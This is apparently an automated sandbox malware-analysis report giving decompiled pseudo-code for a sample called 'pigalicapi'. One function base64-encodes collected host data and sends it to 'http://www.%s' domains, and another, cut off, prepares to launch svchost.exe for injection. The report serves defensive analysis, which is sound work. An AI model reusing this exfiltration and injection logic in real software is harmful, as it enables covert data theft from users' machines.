                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD528C715083958FE720CF28D840BABBBE5FF94704F04492EE9C987252E770E985CB56
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 138 24e4ba0-24e4bbc CoInitialize 139 24e4bc2-24e4bff call 24e7b70 SetEvent 138->139 140 24e56f0-24e56fc CoUninitialize 138->140 139->140 144 24e4c05-24e4c0e 139->144 145 24e4c28-24e4c84 VirtualAlloc * 3 144->145 146 24e4c10-24e4c21 WaitForSingleObject 144->146 148 24e4c8a-24e4c8e 145->148 149 24e56eb 145->149 146->145 147 24e4c23 146->147 147->140 148->149 150 24e4c94-24e4c98 148->150 149->140 150->149 151 24e4c9e-24e4cbd 150->151 153 24e52a2-24e52b2 151->153 154 24e4cc3-24e4cd0 151->154 155 24e52b4-24e52be 153->155 156 24e5325-24e534e call 24e8370 153->156 157 24e529d 154->157 158 24e4cd6-24e4ce3 154->158 155->156 159 24e52c0-24e52d1 155->159 173 24e56b8-24e56e5 VirtualFree * 3 156->173 174 24e5354-24e537f lstrlenA * 2 156->174 160 24e4d1c-24e4d29 158->160 161 24e4ce5-24e4d17 call 24e6170 * 2 call 24e60c0 158->161 159->156 165 24e52d3-24e52dd 159->165 163 24e4d2b-24e4d5d call 24e6170 * 2 call 24e60c0 160->163 164 24e4d62-24e4d6f 160->164 161->157 163->157 170 24e4da8-24e4db5 164->170 171 24e4d71-24e4da3 call 24e6170 * 2 call 24e60c0 164->171 165->156 169 24e52df-24e5322 call 24e7b70 165->169 169->156 176 24e4e2c-24e4e39 170->176 177 24e4db7-24e4dd8 GetCurrentThreadId call 24e6170 170->177 171->157 173->149 174->173 175 24e5385-24e53ca wsprintfA CryptBinaryToStringA 174->175 175->173 182 24e53d0-24e544e MultiByteToWideChar call 24e17d0 175->182 183 24e4e3b-24e4e6d call 24e6170 * 2 call 24e60c0 176->183 184 24e4e72-24e4e7f 176->184 203 24e4dfd-24e4e04 177->203 204 24e4dda-24e4dfb call 24e6170 call 24e60c0 177->204 209 24e569b-24e56a2 182->209 210 24e5454-24e545e 182->210 183->157 195 24e4ee1-24e4eee 184->195 196 24e4e81-24e4eb4 GetSystemMetrics * 2 call 24e6170 184->196 200 24e4f40-24e4f4d 195->200 201 24e4ef0-24e4f13 GlobalMemoryStatus call 24e6170 195->201 219 24e4eb9-24e4edc call 24e6170 call 24e60c0 196->219 215 24e4f4f-24e4f81 call 24e6170 * 2 call 24e60c0 200->215 216 24e4f86-24e4f93 200->216 226 24e4f18-24e4f3b call 24e6170 call 24e60c0 201->226 217 24e4e06-24e4e24 call 24e6170 call 24e60c0 203->217 218 24e4e27 203->218 204->218 209->173 223 24e56a4-24e56b2 VirtualFree 209->223 224 24e5470-24e5477 210->224 225 24e5460-24e546a 210->225 215->157 221 24e4f95-24e4fcb call 24e6170 * 2 call 24e60c0 216->221 222 24e4fd0-24e4fdd 216->222 217->218 218->157 219->157 221->157 238 24e4fdf-24e502d lstrlenA call 24e6170 * 2 call 24e60c0 222->238 239 24e5032-24e503f 222->239 223->173 233 24e551f-24e5526 224->233 235 24e547d-24e54af VirtualFree 224->235 225->224 225->233 226->157 233->209 244 24e552c-24e5540 EnterCriticalSection 233->244 249 24e54c0-24e54c7 235->249 238->157 245 24e5096-24e50a3 239->245 246 24e5041-24e5091 lstrlenA call 24e6170 * 2 call 24e60c0 239->246 257 24e558c-24e55c1 VirtualAlloc 244->257 258 24e5542-24e5573 VirtualAlloc call 24e7b70 244->258 263 24e5104-24e5111 245->263 264 24e50a5-24e50ff lstrlenA call 24e6170 * 2 call 24e60c0 245->264 246->157 249->233 262 24e54c9-24e54f5 call 24e17d0 249->262 272 24e568e-24e5695 LeaveCriticalSection 257->272 273 24e55c7-24e55d8 GetTickCount 257->273 280 24e5578-24e5587 258->280 288 24e54fa-24e550d 262->288 269 24e5172-24e517f 263->269 270 24e5113-24e516d lstrlenA call 24e6170 * 2 call 24e60c0 263->270 264->157 286 24e51e0-24e51ed 269->286 287 24e5181-24e51db lstrlenA call 24e6170 * 2 call 24e60c0 269->287 270->157 272->209 283 24e561c-24e5659 call 24e7b70 * 2 273->283 284 24e55da-24e561a call 24e7b70 * 2 273->284 280->272 330 24e565c-24e568b VirtualFree 283->330 284->330 292 24e523f-24e524c 286->292 293 24e51ef-24e523d lstrlenA call 24e6170 * 2 call 24e60c0 286->293 287->157 300 24e550f-24e5519 288->300 301 24e551b 288->301 292->157 308 24e524e-24e529a call 24e9b90 call 24e6170 * 2 call 24e60c0 292->308 293->157 300->301 311 24e551d 300->311 301->233 308->157 311->249 330->272
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                        			E024E4BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                                                                                                                                        				long _v52;
                                                                                                                                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                                                                                                                                        				char* _v60;
                                                                                                                                                                                                                                                                                                        				CHAR* _v64;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v68;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                                                                                                        				int _v76;
                                                                                                                                                                                                                                                                                                        				void* _v80;
                                                                                                                                                                                                                                                                                                        				void* _v84;
                                                                                                                                                                                                                                                                                                        				void* _v88;
                                                                                                                                                                                                                                                                                                        				void* _v92;
                                                                                                                                                                                                                                                                                                        				void* _v96;
                                                                                                                                                                                                                                                                                                        				void* _v100;
                                                                                                                                                                                                                                                                                                        				void* _v124;
                                                                                                                                                                                                                                                                                                        				void* _v132;
                                                                                                                                                                                                                                                                                                        				void* _v136;
                                                                                                                                                                                                                                                                                                        				void* _v140;
                                                                                                                                                                                                                                                                                                        				void* _v144;
                                                                                                                                                                                                                                                                                                        				void* _v148;
                                                                                                                                                                                                                                                                                                        				void* _v152;
                                                                                                                                                                                                                                                                                                        				void* _v156;
                                                                                                                                                                                                                                                                                                        				void* _v160;
                                                                                                                                                                                                                                                                                                        				char _v420;
                                                                                                                                                                                                                                                                                                        				CHAR* _v424;
                                                                                                                                                                                                                                                                                                        				int _v428;
                                                                                                                                                                                                                                                                                                        				void* _v432;
                                                                                                                                                                                                                                                                                                        				long _v436;
                                                                                                                                                                                                                                                                                                        				short _v948;
                                                                                                                                                                                                                                                                                                        				void* _v952;
                                                                                                                                                                                                                                                                                                        				void* _v956;
                                                                                                                                                                                                                                                                                                        				void* _v960;
                                                                                                                                                                                                                                                                                                        				void* _v964;
                                                                                                                                                                                                                                                                                                        				long _v968;
                                                                                                                                                                                                                                                                                                        				void* _t306;
                                                                                                                                                                                                                                                                                                        				void* _t307;
                                                                                                                                                                                                                                                                                                        				void* _t308;
                                                                                                                                                                                                                                                                                                        				int _t312;
                                                                                                                                                                                                                                                                                                        				int _t318;
                                                                                                                                                                                                                                                                                                        				long _t328;
                                                                                                                                                                                                                                                                                                        				void* _t333;
                                                                                                                                                                                                                                                                                                        				void* _t351;
                                                                                                                                                                                                                                                                                                        				long _t358;
                                                                                                                                                                                                                                                                                                        				void* _t637;
                                                                                                                                                                                                                                                                                                        				void* _t638;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        					L83:
                                                                                                                                                                                                                                                                                                        					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					E024E7B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                                                        					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                                                        					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                                                        					_v40 = 0xea60;
                                                                                                                                                                                                                                                                                                        					_v44 = _v28;
                                                                                                                                                                                                                                                                                                        					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                                                        						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                                                        						_v52 = 0x100000;
                                                                                                                                                                                                                                                                                                        						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        						_v48 = _t306;
                                                                                                                                                                                                                                                                                                        						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        						_v56 = _t307;
                                                                                                                                                                                                                                                                                                        						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        						_v60 = _t308;
                                                                                                                                                                                                                                                                                                        						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                                                        							L82:
                                                                                                                                                                                                                                                                                                        							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v68 = _v48;
                                                                                                                                                                                                                                                                                                        							_v80 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                                                        								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                                        							if( *0x24f18a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                                                        								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                                        								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                                                        								E024E7B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                                                        								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                                        								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                                        							_t312 = E024E8370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                                                        							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                                                        							_v76 = _t312;
                                                                                                                                                                                                                                                                                                        							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                                                        								L81:
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								goto L82;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                                                        								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                                                        								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                                                        									goto L81;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                                                        								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                                        								_v428 = 0x100000;
                                                                                                                                                                                                                                                                                                        								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                                                        									goto L81;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v956 = 0;
                                                                                                                                                                                                                                                                                                        								_v432 = 0;
                                                                                                                                                                                                                                                                                                        								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                                                        								_v952 = 0;
                                                                                                                                                                                                                                                                                                        								_t328 = E024E17D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                                        								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                                        								_v436 = _t328;
                                                                                                                                                                                                                                                                                                        								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                                                        									L79:
                                                                                                                                                                                                                                                                                                        									if(_v956 != 0) {
                                                                                                                                                                                                                                                                                                        										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L81;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                                                        									if( *0x24f18a4 != 1) {
                                                                                                                                                                                                                                                                                                        										goto L70;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        									_v956 = 0;
                                                                                                                                                                                                                                                                                                        									_v432 = 0;
                                                                                                                                                                                                                                                                                                        									_v960 = 0;
                                                                                                                                                                                                                                                                                                        									while(_v960 < 4) {
                                                                                                                                                                                                                                                                                                        										_t358 = E024E17D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                                        										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                                        										_v436 = _t358;
                                                                                                                                                                                                                                                                                                        										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                                                        											goto L70;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L70;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									L70:
                                                                                                                                                                                                                                                                                                        									if(_v436 > 0) {
                                                                                                                                                                                                                                                                                                        										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                                        										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                                                        											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                                        											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        											_v964 = _t333;
                                                                                                                                                                                                                                                                                                        											if(_v964 != 0) {
                                                                                                                                                                                                                                                                                                        												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                                                        													E024E7B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                                                        													E024E7B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                                        													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													E024E7B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                                        													E024E7B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                                                        													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                                        												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                                                        											E024E7B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                                                        											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                                        											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L79;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L83;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
























































                                                                                                                                                                                                                                                                                                        0x024e4bac
                                                                                                                                                                                                                                                                                                        0x024e4bb5
                                                                                                                                                                                                                                                                                                        0x024e4bbc
                                                                                                                                                                                                                                                                                                        0x024e56f0
                                                                                                                                                                                                                                                                                                        0x024e56f0
                                                                                                                                                                                                                                                                                                        0x024e56fc
                                                                                                                                                                                                                                                                                                        0x024e4bc2
                                                                                                                                                                                                                                                                                                        0x024e4bcc
                                                                                                                                                                                                                                                                                                        0x024e4bd1
                                                                                                                                                                                                                                                                                                        0x024e4bdb
                                                                                                                                                                                                                                                                                                        0x024e4be1
                                                                                                                                                                                                                                                                                                        0x024e4beb
                                                                                                                                                                                                                                                                                                        0x024e4bf9
                                                                                                                                                                                                                                                                                                        0x024e4c31
                                                                                                                                                                                                                                                                                                        0x024e4c34
                                                                                                                                                                                                                                                                                                        0x024e4c49
                                                                                                                                                                                                                                                                                                        0x024e4c4f
                                                                                                                                                                                                                                                                                                        0x024e4c60
                                                                                                                                                                                                                                                                                                        0x024e4c66
                                                                                                                                                                                                                                                                                                        0x024e4c77
                                                                                                                                                                                                                                                                                                        0x024e4c7d
                                                                                                                                                                                                                                                                                                        0x024e4c84
                                                                                                                                                                                                                                                                                                        0x024e56eb
                                                                                                                                                                                                                                                                                                        0x024e4bf6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4c9e
                                                                                                                                                                                                                                                                                                        0x024e4ca1
                                                                                                                                                                                                                                                                                                        0x024e4ca4
                                                                                                                                                                                                                                                                                                        0x024e4cb6
                                                                                                                                                                                                                                                                                                        0x024e4cb3
                                                                                                                                                                                                                                                                                                        0x024e4cb3
                                                                                                                                                                                                                                                                                                        0x024e52a8
                                                                                                                                                                                                                                                                                                        0x024e52b2
                                                                                                                                                                                                                                                                                                        0x024e52eb
                                                                                                                                                                                                                                                                                                        0x024e52f3
                                                                                                                                                                                                                                                                                                        0x024e530e
                                                                                                                                                                                                                                                                                                        0x024e5313
                                                                                                                                                                                                                                                                                                        0x024e5322
                                                                                                                                                                                                                                                                                                        0x024e5322
                                                                                                                                                                                                                                                                                                        0x024e532b
                                                                                                                                                                                                                                                                                                        0x024e533f
                                                                                                                                                                                                                                                                                                        0x024e5344
                                                                                                                                                                                                                                                                                                        0x024e5347
                                                                                                                                                                                                                                                                                                        0x024e534e
                                                                                                                                                                                                                                                                                                        0x024e56b8
                                                                                                                                                                                                                                                                                                        0x024e56c3
                                                                                                                                                                                                                                                                                                        0x024e56d4
                                                                                                                                                                                                                                                                                                        0x024e56e5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5354
                                                                                                                                                                                                                                                                                                        0x024e5354
                                                                                                                                                                                                                                                                                                        0x024e5362
                                                                                                                                                                                                                                                                                                        0x024e537f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5397
                                                                                                                                                                                                                                                                                                        0x024e539d
                                                                                                                                                                                                                                                                                                        0x024e53a0
                                                                                                                                                                                                                                                                                                        0x024e53ca
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e53d0
                                                                                                                                                                                                                                                                                                        0x024e53da
                                                                                                                                                                                                                                                                                                        0x024e53fd
                                                                                                                                                                                                                                                                                                        0x024e5403
                                                                                                                                                                                                                                                                                                        0x024e5439
                                                                                                                                                                                                                                                                                                        0x024e543e
                                                                                                                                                                                                                                                                                                        0x024e5441
                                                                                                                                                                                                                                                                                                        0x024e544e
                                                                                                                                                                                                                                                                                                        0x024e569b
                                                                                                                                                                                                                                                                                                        0x024e56a2
                                                                                                                                                                                                                                                                                                        0x024e56b2
                                                                                                                                                                                                                                                                                                        0x024e56b2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e56a2
                                                                                                                                                                                                                                                                                                        0x024e545e
                                                                                                                                                                                                                                                                                                        0x024e5477
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e548b
                                                                                                                                                                                                                                                                                                        0x024e5491
                                                                                                                                                                                                                                                                                                        0x024e549b
                                                                                                                                                                                                                                                                                                        0x024e54a5
                                                                                                                                                                                                                                                                                                        0x024e54c0
                                                                                                                                                                                                                                                                                                        0x024e54f5
                                                                                                                                                                                                                                                                                                        0x024e54fa
                                                                                                                                                                                                                                                                                                        0x024e54fd
                                                                                                                                                                                                                                                                                                        0x024e550d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e551d
                                                                                                                                                                                                                                                                                                        0x024e54ba
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e54ba
                                                                                                                                                                                                                                                                                                        0x024e550d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e551f
                                                                                                                                                                                                                                                                                                        0x024e551f
                                                                                                                                                                                                                                                                                                        0x024e5526
                                                                                                                                                                                                                                                                                                        0x024e5533
                                                                                                                                                                                                                                                                                                        0x024e5540
                                                                                                                                                                                                                                                                                                        0x024e5598
                                                                                                                                                                                                                                                                                                        0x024e55ae
                                                                                                                                                                                                                                                                                                        0x024e55b4
                                                                                                                                                                                                                                                                                                        0x024e55c1
                                                                                                                                                                                                                                                                                                        0x024e55d8
                                                                                                                                                                                                                                                                                                        0x024e5631
                                                                                                                                                                                                                                                                                                        0x024e5654
                                                                                                                                                                                                                                                                                                        0x024e5659
                                                                                                                                                                                                                                                                                                        0x024e55da
                                                                                                                                                                                                                                                                                                        0x024e55ef
                                                                                                                                                                                                                                                                                                        0x024e5612
                                                                                                                                                                                                                                                                                                        0x024e5617
                                                                                                                                                                                                                                                                                                        0x024e5617
                                                                                                                                                                                                                                                                                                        0x024e566b
                                                                                                                                                                                                                                                                                                        0x024e567c
                                                                                                                                                                                                                                                                                                        0x024e568b
                                                                                                                                                                                                                                                                                                        0x024e568b
                                                                                                                                                                                                                                                                                                        0x024e5542
                                                                                                                                                                                                                                                                                                        0x024e5552
                                                                                                                                                                                                                                                                                                        0x024e555b
                                                                                                                                                                                                                                                                                                        0x024e5573
                                                                                                                                                                                                                                                                                                        0x024e5578
                                                                                                                                                                                                                                                                                                        0x024e5584
                                                                                                                                                                                                                                                                                                        0x024e5584
                                                                                                                                                                                                                                                                                                        0x024e5695
                                                                                                                                                                                                                                                                                                        0x024e5695
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e5526
                                                                                                                                                                                                                                                                                                        0x024e545e
                                                                                                                                                                                                                                                                                                        0x024e534e
                                                                                                                                                                                                                                                                                                        0x024e4c84
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e4bf9

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 024E4BAC
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 024E4BDB
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 024E4C19
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C49
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C60
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C77
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 024E56F0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                                                                        • String ID: $`$pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 1834614700-42206024
                                                                                                                                                                                                                                                                                                        • Opcode ID: 74825eac3dfefa928f2a4751d4e57e64880b70ad825839da2ef4c2474272fc4a
                                                                                                                                                                                                                                                                                                        • Instruction ID: b7b2cb0b26d5e75d720c99debc3cde91025aeebad20ff59faf8327fa6ba29119
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74825eac3dfefa928f2a4751d4e57e64880b70ad825839da2ef4c2474272fc4a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F462C2B1D00214EBEF15DB90DC84FAEB779BF49706F04858EE60A6B281E7705A85CF61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E20B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                                                                                                                        				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1016;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                                        				void _v1100;
                                                                                                                                                                                                                                                                                                        				signed int _v1104;
                                                                                                                                                                                                                                                                                                        				CHAR* _t121;
                                                                                                                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                                                                                                                        				int _t130;
                                                                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                                                                        				int _t140;
                                                                                                                                                                                                                                                                                                        				int _t143;
                                                                                                                                                                                                                                                                                                        				int _t145;
                                                                                                                                                                                                                                                                                                        				int _t148;
                                                                                                                                                                                                                                                                                                        				void* _t263;
                                                                                                                                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                                                                                                                                        				void* _t266;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                        					L26:
                                                                                                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                                                        				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                                                        				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v276, " ");
                                                                                                                                                                                                                                                                                                        					_t121 = lstrcatA( &_v276, _a12);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				E024E7D20(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                                                        				E024E7D20( &_v1092,  &_v1092, 0, 0x44);
